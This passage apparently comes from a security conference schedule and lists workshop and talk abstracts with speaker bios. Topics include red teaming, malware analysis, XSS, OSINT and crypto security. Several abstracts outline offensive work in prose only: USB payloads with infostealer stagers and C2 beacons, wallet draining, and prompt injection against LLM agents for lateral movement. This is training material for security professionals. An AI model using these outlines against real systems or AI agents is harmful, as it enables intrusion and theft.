Omar Santos is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition of Secure AI (CoSAI). Omar’s collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.

Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.

Esta dinámica colaborativa tipo tabletop permite una experiencia controlada y dirigida a comprender y experimentar el desarrollo de un ciberincidente. Para esto, recreamos un escenario de crisis paso a paso, dando lugar a los equipos a explorar las mejores opciones. Este tipo de ejercicios, cuando se utiliza junto a una metodología, buscan evaluar, identificar áreas de mejora y desarrollar planes de acción para mejorar capacidades de respuesta a incidentes.x000D x000D Para participar no es necesario contar con conocimientos técnicos específicos, se espera que en la audiencia exista diversidad de profesionales con perfiles diversos en materia de ciberseguridad y seguridad de la información.x000D x000D Características: x000D x000D – Desarrollo por eventos: La crisis se desplegará a través de una serie de eventos inesperados y piezas de información fragmentada. Tendrán que recopilar datos, analizar la situación y decidir para luego proceder.x000D x000D – Trabajo en equipo: Los asistentes formarán parte de equipos, replicando la necesidad de colaboración entre diferentes roles y áreas para abordar una situación compleja. La comunicación y la coordinación serán fundamentales.x000D x000D – Decisiones priorizadas: Cada elección tendrá consecuencias directas que podrán cambiar el desenlace de la situación. El objetivo es evitar una catástrofe, tomando decisiones posibles con la información disponible en cada momento.x000D x000D – Aprendizaje práctico: Esta actividad busca generar una experiencia que sirva como base para el aprendizaje. Es una oportunidad para poner a prueba habilidades de resolución de problemas, liderazgo y comprensión en un entorno controlado.x000D x000D Los facilitadores han realizado innumerables ejercicios tabletop (TTX) en los últimos 6 años, en distintos países de Latinoamérica y Estados Unidos. Además, han desarrollado varias investigaciones publicadas en papers académicos, que incluyen una metodología, una plataforma para automatizar las ejecuciones, y un modelo de aplicación de TTXs para madurez de capacidades de IR (ver publicaciones en perfiles de Linkedin). También han dictado talleres de diseño de ejercicios TTX, incluyendo uno para la comunidad de FIRST.org. Adicionalmente, realizaron una actividad similar a la propuesta en la conferencia Ekoparty 2024. Más allá de la dinámica, se busca compartir una combinación de las mejores prácticas del sector y la experiencia en la realización de este tipo de ejercicios.

Cybersecurity professional with a background in electronic engineering and several industry-recognized certifications. 20+ years of teaching experience at the most prestigious universities in Argentina. 4 published books and +15 peer-reviewed research papers. Has worked in the public and private sectors, including regional roles in global companies.

Cybersecurity professional with 14+ years of experience as Security and IT consultant. Certified Incident Handler (ECIH) with a degree in Information Security and Communications. Currently works as R&D+i Manager at BASE4 Security, where he leads the company’s research and development initiatives.

Multiple agencies have attempted to regulate cryptocurrencies through various means. This workshop will begin with a short presentation about the different organizations with an interest in regulating cryptocurrency (SEC, CFTC, IRS, and DOJ) and provide examples of enforcement actions. Next, participants will break out into discussion groups to consider the pros and cons of regulation by enforcement. Then, participants will be given a hypothetical cryptocurrency and be assigned a role either as a ‘regulator’ or as a ‘developer.’ The participants will engage in a settlement type discussion to determine if the cryptocurrency should be regulated under one agency, multiple agencies, or not at all.

Chelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.

Cryptocurrency nodes validate and relay transactions across the network. Like servers in a traditional financial system, nodes store a copy of the blockchain and enforce the network’s rules. Many of us want to run their own node for reasons of security, convenience, and independence of other people’s node configurations. Come to understand nodes, build your own, and explore configurations to test wallet applications on your new cryptocurrency node.

Diego ‘rehrar’ Salazar has been around the FOSS and cryptocurrency communities for eight years. He owns and runs Cypher Stack, a company that performs novel research and makes contributions to various FOSS projects. He has organized and managed several villages at defcon, c3, and more.

No spoilers! Join us for a thrilling premier of a DoD-designed wargame about undersea threats and cyber planning.

Cyberjūtsu is a new way to teach cybersecurity inspired from martial arts trainings. It is an educational way which allows everyone (novice to expert) to practice together and improve themselves in cybersecurity through confrontation. It follows budō (judo, jujitsu, karate…) principles and ethical code. The goal is to reach “maximum-efficient use of computer” in a “mutual benefit” of a human confrontation. It’s a digital martial art fight e-sport using linux shell.

President of WOCSA France, Cyberjutsu Project Leader for WOCSA Head of Managed Detection and Response Services at Sopra Steria Cybersecurity External Professor at Cybersecurity Master (SSIR) for Science University of Toulouse, France 1st dan Judo Jujitsu

WOCS’HACK Project Leader for WOCSA France. Detection Analyst and Threat Hunter at Sopra Steria Cybersecurity. 3rd dan Judo Jujitsu

This workshop will provide participants with the necessary knowledge to plan and execute red team exercises that accurately emulate real-world threat actors. Using MITRE ATT&CK as a foundation, attendees will learn how to map adversary tactics, techniques, and procedures (TTPs) to red team operations, ensuring realism down to the indicator of compromise (IOC) level. The workshop culminates with the hands-on development of a red team campaign to emulate an advanced persistent threat (APT) group. For this exercise, participants will receive simulated exercise objectives and rules of engagement and will use presented techniques to develop a basic red team campaign plan for successfully emulating the selected threat group.

William (Billy) Giles is an Offensive Security leader and practitioner who specializes in red/purple teaming, adversary emulation, and network penetration testing. With a deep passion for understanding and simulating adversary behaviors, he helps organizations across a multitude of industries assess their security postures, identify and remediate vulnerabilities, and build stronger defenses by thinking like an attacker.

While there is increasing content on attacking LLMs hitting the Internet (and at DEFCON), much of it is focused on attacking LLMs from more of a penetration-test perspective without putting the attacks into the broader context of a Red Team operation. As with any technology that we encounter in a network during a Red Team exercise, we should be familiar with how to use it to achieve goals like lateral movement or privilege escalation. Like it or not, in the near future that will increasingly include LLM-based applications and agents.

This session aims to close that gap. The speakers will start with some entry-level theory on how LLMs function under the hood. No math experience? No problem. We’re going to keep things at a nice, high level with special focus on the core functionality of LLMs that enables attacks.

After addressing the theory, the speakers will shift to real-world attacks on LLMs drawn from our operations. This will take two forms: strategies to break LLMs through direct and indirect prompt injection, and ways to take a successful prompt injection and turn it into progress toward your Red Team objectives like enumeration, lateral movement, privilege escalation, or execution.

With the groundwork laid, the workshop will close with a hands-on, multi-level CTF for participants to try some of the direct and indirect prompt injection strategies discussed in the workshop.

Detailed Agenda: 1. Introductions (2 mins) 2. Theory: a. Neural Networks (10 mins) b. LLMs (10 mins) 3. Attack Strategies (15 mins) a. Direct prompt injection strategies + war stories b. Indirect prompt injection strategies + war stories 4. Hands-on CTF (20 mins) 5. Q&A (remainder)

I love breaking applications and AI systems!

Brent is the author of the Red Team Capability Maturity Model and has led and created Red Teams at multiple organizations. He’s now on the consulting side of Red Teaming and is one of the initial members of the company’s new AI Red Team focused on LLM-based applications. With a background in traditional AD operations, though, much of his focus of late has been on bridging the gap between attacking LLMs directly and using them as part of greater operations.

Come out and build EFF’s Rayhunter! ($10 materials fee EFF Donation)

Flow into the world of Tai Chi, where movement meets meditation. This ancient practice creates harmony between the mind and body and cultivates our inner chi or life force energy. The gentle movements with mindful breathwork relax the body, stretch the muscles and move energy improving strength, flexibility and balance. This mind-body practice also centers the mind, reduces stress and helps one to feel grounded and present.

During this moving meditation, we will connect with our inner nature, our community and the beautiful land that surrounds us calling in and moving through the 4 directions and elements of Air, Fire, Water and Earth.

This workshop is inclusive of all bodies. EveryBODY is Welcome here.

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.

Hack your first embedded system! Sit down at our provided laptops and be guided through exploiting an IP camera, then learn how you can set up the emulated camera (and other devices) at home with Ludus!

This workshop will cover the fundamentals of Transport Layer Security (TLS) version 1.3, the latest Encrypted Client Hello (ECH) extension, and its application as a Command and Control (C2) technique to bypass network defenses.

Jose is an experienced Red Teamer who dabbles in system administration, reverse engineering, and coding with Rust.

This interactive workshop explores the history and evolution of draining attacks across major blockchains such as Ethereum, Solana, and TON. Participants will witness live demonstrations of various draining techniques, from early ERC-20 approval abuse to sophisticated token spoofing. Learn to recognize, trace, and defend against these exploits while discussing popular laundering methods and current security measures. A final group challenge will involve tracking an attacker’s wallet and evaluating how to recover stolen funds.

Utvecklas is a computer scientist and privacy advocate who has integrated cryptocurrency into online businesses since 2016. Over time, cryptocurrency itself became his primary interest. Outside of work, his research specializes in exploits — whether past, ongoing, or potential.

George is a cryptocurrency enthusiast who has been actively involved in the space since 2018. With a focus on crypto marketing and security, he has successfully launched multiple projects aimed at improving both user adoption and safety. George is passionate about bridging the gap between complex technologies and mainstream audiences.

BIC works hard to give more bad days to bad actors. Luckily, threat actors move to a certain rhythm, and following it can be just what you need to give them more blues. This session will demonstrate Domain Intelligence Analysis, a newly discussed concept from our investigations team that equips the audience to efficiently use DNS artifacts to protect their organization. Whether preventing a potential threat or responding to an existing one, DNS can support specific actions that make achieving these goals easier.

Domain Intelligence Analysis informs incident response efforts and can shape detection engineering to identify and investigate threats earlier—when context is more valuable. These techniques will be supported with examples of domain and infrastructure discoveries made by our research team, some of which were featured in the 2025 Trends in Malicious Infrastructure report, created with support from two Black practitioners. These examples show how quickly domains can be discovered before they become public IOCs.

Join this presentation to identify relevant IOCs faster and enable more informed, timely investigations into cybercrime.

Malachi Walker, DomainTools Security Advisor, has experience in information security, from DNS to crime and conflict in cyberspace to cybersecurity governance and cybersecurity program and design. At DomainTools, he applies this background to help organizations understand the threat landscape, especially in the area of malicious online infrastructure through advocacy of the company’s growing portfolio of investigative and proactive cyber defense offerings. Prior to DomainTools, he worked in FTI Consulting’s Cybersecurity practice and led product and brand protection efforts at WhiteHawk Inc. Malachi earned his Master’s with a concentration in Cybersecurity Management at Virginia Polytechnic Institute and State University.

Designing embedded systems requires more than just writing software—it demands a new way of thinking. This talk introduces key concepts that set embedded design apart from traditional software development. We’ll explore microcontrollers vs. microprocessors, bare-metal programming vs. using an operating system, controlling peripherals through registers, handling interrupts, communication protocols, and embedded debugging techniques. Whether you’re a curious developer or diving into hardware for the first time, this session will give you the foundation to build complex embedded systems with confidence.

Dr. Ian Harris is a Professor of Computer Science at the University of California, Irvine, where he conducts research at the intersection of hardware security and natural language processing. His work spans secure system design, information flow tracking, and the development of NLP tools for cybersecurity applications. Dr. Harris is also an experienced educator, teaching courses in embedded system design both on campus and online through Coursera, where he reaches a global audience of learners. With a strong background in computer architecture and verification, he is committed to advancing secure and intelligent computing systems through both innovative research and accessible education.

XSS in modern React apps isn’t gone, it’s just hiding in new places. In this workshop, we’ll expose how React createElement can be your way in. We’ll walk through several React DOM XSS lab scenarios based on real bug bounty findings from vulnerable applications in the wild. You’ll see how untrusted input can make its way from a variety of realistic sources to a React createElement sink, leading to exploitable XSS, even in apps built with frameworks like Next.js. These labs are realistic, grounded in actual bugs, and designed to sharpen your ability to spot and exploit DOM XSS in the kinds of apps bounty hunters hit every day.

Nick Copi is an AppSec engineer and active bug bounty hunter who regularly submits high signal findings to notable companies. He has a diverse technical background, including building and hosting infrastructure and challenges for a couple dozen capture the flag or other offensive hands-on training lab events. He is a member of the CTBB Full Time Hunter’s Guild, and an active contributor to the online bug bounty space, always eager to share interesting ideas around other people’s “nearly exploitable bugs” as well as novel attack scenarios. His hobbies include debugging minified JavaScript, grepping Blink source in hopes of discovering magical undocumented behaviors, and doing pull ups on iframe jungle gyms.

This hands-on workshop teaches you how to track current threat actor activity, build emulation plans from real-world intelligence, and test them safely to improve your organization’s defenses. You’ll learn how to gather and interpret TTPs using open-source tools like VirusTotal, ANY.RUN, and MalwareBazaar, then turn that into executable emulation using tools like CALDERA or Atomic Red Team. We’ll finish by analyzing your test results and identifying where your detections and policies may fall short.

Roxey Davis is a passionate cybersecurity leader, storyteller, and advocate for inclusive defense. With a background in Security Operations, Threat Intelligence, and Governance, Risk, and Compliance (GRC), they specialize in turning complex threats into collaborative learning opportunities for all skill levels. Currently serving as a GRC Security Analyst and the Chief Operating Officer of the Women’s Society of Cyberjutsu, Roxey helps create spaces where underrepresented voices can lead, learn, and thrive.

Their work bridges technical expertise with empathy-driven strategy, focusing on threat-informed defense, insider risk, and building communities where defenders support each other like a well-formed pack. Whether coordinating purple team exercises, launching mentorship programs, or gamifying security awareness, Roxey believes cybersecurity isn’t just about tools — it’s about people, purpose, and preparing before the full moon rises. They’ve spoken at BsidesNOLA and are known for their creative, interactive sessions that blend storytelling, threat models, and the occasional supernatural metaphor.

In this hands-on workshop, participants will analyze anonymized infostealer logs to uncover the human vulnerabilities that make these attacks successful. Using privacy-preserved datasets, attendees will reverse-engineer victim decision patterns, identify high-value behavioral triggers, and craft precision-targeted attack sequences based on real-world data.

Dr. Megan Squire is a researcher in cyber threat intelligence at F-Secure, a consumer-facing cybersecurity software company that focuses on scam protection. Her work tracing illicit finance and extremist influence networks has been featured in hundreds of publications including WIRED, the BBC, NPR, and Frontline.

In this workshop, participants will build and deploy a USB-based intrusion framework: crafting a malicious USB payload, developing a lightweight information-stealing stager, and using the resulting data to deploy a Mythic C2 beacon. The session also covers provisioning and configuring an AWS-hosted command-and-control environment. Attendees will leave with hands-on experience in both the offensive implant and its supporting cloud infrastructure.

Will McGraw is a security professional with a background that spans help desk support, security and compliance consulting, and hands-on offensive security. Currently working as a pentester, he focuses on creative attack paths to achieve initial access and persistence in client environments. With over four years in the industry, they bring practical experience and a hacker’s mindset to their research.

This workshop gives students a hands-on introduction to using the Ghidra disassembler to navigate and analyze malware. This will be immersive learning with no slides: concepts, strategies, and techniques will be illustrated within the user interface of Ghidra and other supporting tools. A malware sample will serve as the “case study.

Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.

Over the past few years, we’ve really seen API hacking take off as a field of its own, diverging from typical web app security, but yet parallel to it. Often we point to the amorphous blob that is web security and go: “here you go, now you can be a hacker too”, with top 10 lists, write-ups, conference talks and whitepapers smiling as we do. This creates a major challenge for developers who want to test their APIs for security or just people who want to get into API hacking, how on earth do you wade through all the general web security to get to the meat of API hacking, what do you even need to know? This talk is going to break down API hacking from a developer point of view, teaching you everything you need to know about API hacking, from the bugs you can find and to the impact you can cause, to how you can easily test your own work or review your peers. So what are you waiting for join me and go hack yourself!

Dr Katie Paxton-Fear is an API security expert and a Security Advocate at Semgrep, in her words: she used to make applications and now she breaks them. A former API developer turned API hacker. She has found vulnerabilities in organizations ranging from the Department of Defense to Verizon, with simple API vulnerabilities. Dr Katie has been a featured expert in the Wall Street Journal, BBC News, ZDNet, The Daily Swig and more. As she shares some of the easy way hackers can exploit APIs and how they get away without a security alert! Dr Katie regularly delivers security training, security research, to some of the largest brands worldwide. She combines easy-to-understand explanations with key technical details that turn security into something everyone can get.

workshop on GPON network security weakness and different attack use cases on GPON network

Akib Sayyed is the Founder and Chief Security Consultant of Matrix-Shell Technologies, an India-based telecom-security firm he established in 2014. Recognised industry-wide as a 5G and telecom-signalling security specialist, Akib has spent more than a decade helping mobile-network operators, MVNOs and regulators uncover and remediate vulnerabilities across legacy (2G/3G/4G) and next-generation (5G Core, VoLTE/VoNR/VoWi-Fi) networks. His expertise spans protocol penetration testing (SS7, Diameter, GTP), radio-access assessments and security-automation tooling.

Under Akib’s leadership, Matrix-Shell has grown into India’s first NCCS-designated 5G Core security test lab and holds ISO/IEC 17025 accreditation for its methodology and results. A frequent conference speaker and Black Hat trainer, he also co-organises the Telecom Village community, where he shares latest threat-intel and open-source tools with the wider security ecosystem. linkedin.com

Across consulting engagements, Akib is known for delivering:

• Policy-aligned testing mapped to 3GPP TS 33.xxx, GSMA FS-series and ITSAR frameworks.
• Automated scanners that cut signalling-assessment time from weeks to hours.
• Action-oriented reports complete with PCAP evidence and remediation playbooks.

Driven by a mission to “secure the core,” Akib continues to advise operators on rolling out resilient 5G infrastructure, mentors the next wave of telecom-security engineers and contributes to global standards bodies shaping the future of mobile-network defence.

In the fast-paced world of cybersecurity, time is of the essence. As vulnerabilities are discovered and threats evolve, the clock is always ticking, and staying ahead of exploits can feel like a race against time. Enter CVEpwn – an automation tool designed to streamline the search for CVE exploits across multiple platforms like GitHub, ExploitDB, and CXSecurity.

In this talk, we’ll dive into the process of automating CVE exploit searches, demonstrating how CVEpwn cuts down on manual effort, accelerates response times, and enables faster vulnerability mitigation. By automating the search for CVE exploits using multiple platforms and APIs, this tool allows you to focus on what really matters: patching vulnerabilities before they get exploited.

Jordan Bonagura is a senior security consultant for Secure Ideas. With more than 20 years of experience in information security, Jordan is passionate about helping companies and clients protect their data and applications from threats and vulnerabilities. As a principal security researcher, he led teams conducting vulnerability management, risk assessments, penetration tests, and boundary-setting to comply with standards for companies in different segments.

Jordan contributed to significant projects, such as developing an integrated GNSS positioning system and an encryption communication protocol between ground and satellite at the Brazilian National Institute of Space Research. He also had the opportunity to speak at some of the most important security conferences around the globe, be a college professor and course coordinator, and consult for the Brazilian police in crime solving.

• Stay Safe Podcast Founder
• Founder – Vale Security Conference – Brazilian Conference
• Consultant Member – Brazilian Commission of High-Tech Crime (OAB / SP)
• SJC Hacker Space President
• Speaker (HackMiami, Layer8, RedHackCon, HackSpaceCon, CNASI, AppSec California, GrrCon, BalCCon2k14, BSides Augusta, H2HC, Angeles Y Demonios, Silver Bullet, Seginfo, ITA, INPE, etc)

Are you ready to transform your career and unlock new opportunities? Hacking Your Career is a self-paced, actionable course designed to equip you with the tools, strategies, and confidence to stand out in a competitive job market.

What You’ll Learn: – Build a personal brand that sets you apart from the competition. – Craft resumes and portfolios that hiring managers love. – Find hidden job opportunities and network effectively. – Master interviews and salary negotiations with ease.

Jason has had a distinguished 20-year career in cybersecurity, previously serving as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin.

He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis.

Jason is a hacker, bug hunter, and is currently ranked 57th all-time on Bugcrowd’s bug bounty leaderboards. Currently, he specializes in recon, web application analysis, and emerging technologies.

Jason has also authored many talks for world-renowned conferences like DEF CON, Bsides, Black Hat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, ToorCon, and many more.

Jason Haddix AKA jhaddix is the CEO and “Hacker in Charge” at Arcanum Information Security. Arcanum is a world class assessment and training company.Jason has had a distinguished 20-year career in cybersecurity previously serving as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin. He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis. Jason is a hacker, bug hunter and currently ranked 57st all-time on Bugcrowd’s bug bounty leaderboards. Currently, he specializes in recon, web application analysis, and emerging technologies. Jason has also authored many talks on offensive security methodology, including speaking at cons such as DEFCON, Besides, BlackHat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, Toorcon and many more.

The financial implications of smart contract vulnerabilities are substantial. Smart contracts often handle large amounts of value, and successful exploitation can lead to significant financial losses for users and project developers. In this session I will share the latest smart contract /web3 security trends and vulnerabilities. The attendees will learn how to create tests for security issues in smart contracts written in Solidity, and how to “profit” from it.

Davide Cioccia is the founder of DCODX, an ethical hacking, and security training firm focusing on DevSecOps and web3. Speaker and trainer at multiple international conferences like Black Hat, HITB, OWASP AppSec, DevSecCon and DEF CON, he is currently leading the DevSecCon Netherlands chapter in Amsterdam.

Cryptocurrency exchanges have the reputation of keeping ‘not your keys so not your coins’, but we analyze further to understand what technology powers them and which security aspects serve users. In this hour we use tools like Helloex and Octobot to build our own experimental testnet exchange. Your team divides into exchange providers maintaining stability and opportunistic traders taking advantage of system loopholes. A group discussion finally concludes under which conditions cryptocurrency exchanges provide security and value.

In today’s bug bounty landscape, advantage goes to those who can see what others miss. The OWASP Amass Project has long equipped researchers with powerful tools for internet asset discovery, but its newest addition—assoc—takes things to the next level. This talk introduces assoc, a tool that allows hunters to explore the Open Asset Model through custom association triples, a concept inspired by RDF triples used in knowledge graphs. These user-defined relationships enable highly targeted queries across a rich graph of internet data, revealing non-obvious associations between domains, IP addresses, certificates, and legal entities.

Attendees will learn how assoc empowers them to define their own asset discovery logic, conduct complex association walks through the graph, and surface infrastructure that traditional scanners and passive methods overlook. Whether you’re pivoting off a supplier’s ASN, correlating certificate reuse across sub-brands, or mapping out a shadow IT network tied to a legal entity, assoc offers an unmatched level of flexibility and precision. Live demos will show how to craft custom triples, execute walks, and extract actionable intelligence—all with an eye toward real-world bug bounty impact. If you’re ready to out-hack the competition, this is a talk you won’t want to miss.

Jeff Foley has over 20 years of experience in information security, focusing on research & development, security assessment, and attack surface management. During the last eight years, Jeff identified a lack of situational awareness in traditional information security programs and shifted his attention to this vital function. He is now the Project Leader for Amass, an OWASP Foundation Flagship Project that provides the community with guidance and tooling for in-depth attack surface mapping and asset discovery. Jeff has assisted various companies with attack surface management and has been invited to speak at conferences. In past lives, Jeff was the Vice President of Research at ZeroFox, focused on proactive cybersecurity outside the traditional corporate perimeter. He also served as the Global Head of Attack Surface Management at Citi, one of the largest global banks, and started their first program addressing exposure management. Jeff began his career serving the United States Air Force Research Laboratory as a contractor specializing in cyber warfare research and development. He concluded his government contracting at Northrop Grumman Corporation, where he performed the roles of Subject Matter Expert for Offensive Cyber Warfare Research & Development and Director of Penetration Testing. In these roles, he also developed a penetration testing training curriculum for the Northrop Grumman Cyber Academy and taught trainers to utilize the material across this international organization. During his time in this profession, Jeff has taught at various academic institutions on offensive security, cloud security, and attack surface management.

Curious about hacking chips using fault-injection? Take your first steps in our (free) glitching workshops! We provide you with hardware & guidance to conduct your first fault-injection attacks, all you need is a laptop running Python & OpenOCD: Reproduce the nRF52 “AirTag” glitch or learn how to glitch one of the chips used in crypto-wallets to store millions of dollars.

This workshop will provide an in-depth, practical demonstration of how real-world Red Team operations are conducted, focusing on the physical aspect of intrusion. We will walk through the entire lifecycle of an engagement, from intelligence gathering and planning to execution and exfiltration.

Unlike operations in other regions, this case study is set in a Brazilian environment, where high crime rates, armed security, and unpredictable urban risks add a unique layer of complexity to physical Red Team engagements. Security personnel in Brazil often rely on physical force and firearms rather than solely procedural measures, making adversarial simulation far more challenging and dangerous.

This session aims to expose security professionals to the often-overlooked risks posed by hybrid attacks and demonstrate why organizations—especially in high-risk regions—must integrate physical security, cybersecurity, and situational awareness to build a comprehensive defense strategy against evolving threats.

Due to high crime rates and frequent security threats, Brazilian companies must adopt stricter policies and proactive security measures to mitigate risks. The increasing sophistication of both criminal organizations and Red Team adversaries forces companies to rethink their physical and cybersecurity defenses, imposing more restrictive controls, robust employee training, and continuous security assessments to ensure resilience against real-world hybrid threats.

Participants will gain insights into advanced Red Team techniques used to bypass security controls, leveraging real-world tactics such as social engineering, badge cloning, physical intrusion, and covert device placement, all while considering the unique security landscape of Brazil. Through a detailed case study, we will showcase how an operation successfully led to the extraction of a sensitive financial document and the installation of a rogue device—in an environment where the risk of exposure carries real-world consequences beyond mere detection.

Jonathan Coradi works as a RedTeam Operator at Hakai Security and has over 7 years of experience in cybersecurity, working as an Offsec Leader in several companies in the industrial, financial and banking sectors in Brazil, focusing on penetration testing, Red Team operations, and physical operations. He also works as a BugHunter, ranking Top 1 on the Bug Bounty platform BugHunt, in addition to finding vulnerabilities in Microsoft, Uber, Mercado Livre, among others.

Charla o workshop de duración y contenido adaptable.x000D x000D La ingeniería inversa en hardware puede convertirse en algo tedioso sin una metodología que ayude en el proceso. Por otro lado, dejamos nuestra seguridad en manos de dispositivos fácilmente vulnerables, como sensores de alarmas y automatizaciones para portones. Por esta razón se plantea esta charla, para que una persona sin conocimientos previos tenga todos los elementos necesarios para determinar si esos dispositivos son seguros. x000D x000D Si bien la charla tiene conceptos técnicos variados, desde usar un osciloscopio, tomar muestras con analizadores lógicos y SDR o entender conceptualmente el funcionamiento de una placa, esta destinado a un público sin conocimientos previos, ya que se utiliza en todo momento un lenguaje simple para explicarlos.x000D x000D x000D (contexto)x000D Esta charla la doy en la eko en la villa de hardware hacking, pero nunca fue grabada. Han venido desde chicos de 15 años que recien se inician hasta adultos con mucha experiencia.

Programador y consultor en seguridad en Websec y líder de la villa de hardware hacking en ekoparty.

In this talk, I will present my analysis of the security and cryptographic architecture of Ente, an alternative to Google Photos. The aim is to demonstrate how application security and cryptography intersect to provide an end-to-end secure solution.

This talk will guide beginners through key concepts such as using a Key Derivation Function (KDF) to generate encryption keys, the purpose and use of envelope encryption, how to share photos using public key cryptography, and much more. Along with the theoretical concepts, I will show how this can be implemented in a secure library such as libsodium. By the end, attendees should be able to understand and reason about similar systems in the real world—and, if needed, take a shot at building one themselves.

Pushkar Jaltare is a Security Architect at Fastly, a leading Edge computing and Content Delivery Network. He acts as a security subject matter expert for different product lines, which include Edge Compute, Content Delivery, and Fastly’s WAF. He is also responsible for evaluating the security, privacy, and governance of SAAS vendors utilized by Fastly. His previous experience includes a stint at AWS, where he performed design reviews for widely used AWS services. He holds a Masters degree in Information Assurance from Northeastern University and is an expert in the fields of Application Security, Cryptography, Web Application Security, and Network Security.

We take a different approach to learning Python programming – we break stuff! In this session we use the Thonny development tool to step line by line through a python program and to learn the principles of variables, input and output, making code reusable, and working with data stored in files. We will see what each line of python code does and how we can use that to create our own programs!

Bradán graduated third grade with a degree in crayon. This, combined with his unwavering belief in “how difficult could it be”, has made him eminently qualified to wash dishes. His background in UX Designer & User Research and as a purveyor of personas demonstrates his profound talent for making stuff up with confidence. Bradán pre-dates the internet and ARPANET.

The OWASP Amass Project has become a foundational toolset for security researchers, bug bounty hunters, red teamers, and defenders who rely on automated reconnaissance and external asset discovery to map attack surfaces. With the release of Amass v5.0, the project has undergone a major architectural transformation centered around the Open Asset Model (OAM)—a structured property graph that defines how Internet-facing assets and their relationships are stored, analyzed, and queried.

This two-hour hands-on workshop, led by Jeff Foley, the project’s founder and long-time maintainer, offers attendees a first look at Amass v5.0’s new intelligence collection engine, which seamlessly populates the Open Asset Model database during enumeration operations. The session will walk through how Amass collects and organizes OSINT from various sources—including DNS records, WHOIS/RDAP data, TLS certificates, and more—and models the results as a dynamic graph of properties and relationships between discovered assets.

Participants will learn to use core Amass tools such as:

amass enum – for deep, recursive asset discovery using passive and active techniques

amass subs – for quick subdomain discovery from the Open Asset Model database

amass viz – to render interactive visualizations of asset relationships in the Open Asset Model

In addition to these staples, the workshop will introduce the new assoc tool, a powerful query interface designed to unlock the true potential of the Open Asset Model database. Built around a custom Triples query language, the assoc tool enables users to describe paths—called association walks—through the asset graph, surfacing linked insights across related properties (e.g., domains associated with a network, IPs linked to DNS records, etc.). The language is inspired by RDF-style triples but optimized for simplicity and clarity in cybersecurity investigations.

Amass v5.0 also ships with completely refactored documentation, providing diagrams to help users understand the data types, their fields, and their associations within the OAM. This new documentation dramatically lowers the learning curve for users new to the Amass Project, making it easier to build mental models of how different types of Internet assets are discovered and interrelated.

This workshop will include a live walkthrough of setting up and running Amass v5.0, from enumeration to advanced queries. Participants will leave with hands-on experience using the full Amass suite, understanding how the Open Asset Model works under the hood, and writing association walk queries using Triples.

What to Expect:

Real-world reconnaissance examples using Amass against publicly available targets

Query design exercises with assoc to extract actionable intelligence

Tips for integrating Amass data into your own tooling and pipelines

Visual mapping of organizational assets using OAM and viz

Level: Intermediate Some experience with OSINT tools, command-line interfaces, or network security is recommended but not required. The workshop is designed to be self-contained and accessible.

Attendees are encouraged to bring a laptop and follow along. Project contributors will be present throughout the session to provide hands-on support, answer questions, and help troubleshoot issues in real time, making this a highly interactive experience.

By the end of the session, participants will walk away with practical skills in reconnaissance, data extraction from structured asset models, and a solid understanding of how Amass v5.0 is redefining modern Internet-wide discovery.

Join us at DEF CON to explore the future of OSINT automation and asset intelligence with OWASP Amass!

Jeff Foley has over 20 years of experience in information security, focusing on research & development, security assessment, and attack surface management. During the last eight years, Jeff identified a lack of situational awareness in traditional information security programs and shifted his attention to this vital function. He is now the Project Leader for Amass, an OWASP Foundation Flagship Project that provides the community with guidance and tooling for in-depth attack surface mapping and asset discovery. Jeff has assisted various companies with attack surface management and has been invited to speak at conferences. In past lives, Jeff was the Vice President of Research at ZeroFox, focused on proactive cybersecurity outside the traditional corporate perimeter. He also served as the Global Head of Attack Surface Management at Citi, one of the largest global banks, and started their first program addressing exposure management. Jeff began his career serving the United States Air Force Research Laboratory as a contractor specializing in cyber warfare research and development. He concluded his government contracting at Northrop Grumman Corporation, where he performed the roles of Subject Matter Expert for Offensive Cyber Warfare Research & Development and Director of Penetration Testing. In these roles, he also developed a penetration testing training curriculum for the Northrop Grumman Cyber Academy and taught trainers to utilize the material across this international organization. During his time in this profession, Jeff has taught at various academic institutions on offensive security, cloud security, 